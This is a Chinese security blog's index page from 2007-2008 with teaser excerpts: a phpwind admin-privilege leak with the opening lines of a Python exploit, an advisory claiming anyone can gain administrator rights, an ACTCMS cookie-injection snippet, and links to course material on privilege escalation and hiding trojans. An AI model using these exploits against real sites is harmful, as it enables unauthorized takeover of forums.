popphen.net.ru
  • 1 
预览模式: 普通 | 列表

phpwind管理权限泄露漏洞+利用程序

作者:天晴无名氏 日期:2008-06-01 15:23

Python代码 各位大大自己分析写其他版吧
常来http://www.80sec.com

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_op

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 153

最新phpwind管理权限泄露漏洞通杀

作者:天晴无名氏 日期:2008-06-01 15:21

漏洞发布:http://www.80sec.com/

漏洞作者:jianxin@80sec.com

漏洞厂商: http://www.phpwind.com/  本漏洞影响phpwind所有版本

漏洞危害:高

漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.co

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 134

ACTCMS网站管理系统cookie注入

作者:天晴无名氏 日期:2008-04-08 00:14

founder:小帅
转载请注明出处: 小帅's blog http://blog.0kee.com/xiaoshuai

<%
id=request("id")
postuser=request("postuser")
sql="select friend from clubuser where clubuser_name='&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 225

网络安全管理师教程

作者:天晴无名氏 日期:2007-01-25 00:29

网络安全管理师教程

下载地址:http://vip.enet.org.cn/Soft/UploadSoft/200603/20060330120215906.rar
下载地址:http://vip.enet.org.cn/Soft/UploadSoft/200603/20060322025801288.rar
下载地址:http://vip.enet.org.cn/Soft/UploadSoft/200603/20060325161816526.rar
基本全是文本:
提升权限的办法-总结
网站脚本目录权限设置
本地连接做端口过滤
服务器IIS权限设置教程!防FSO,ASP木马
木马隐藏技术课件
类别: Resources | 引用: 47 | 评论: 0 | 阅读: 559
  • 1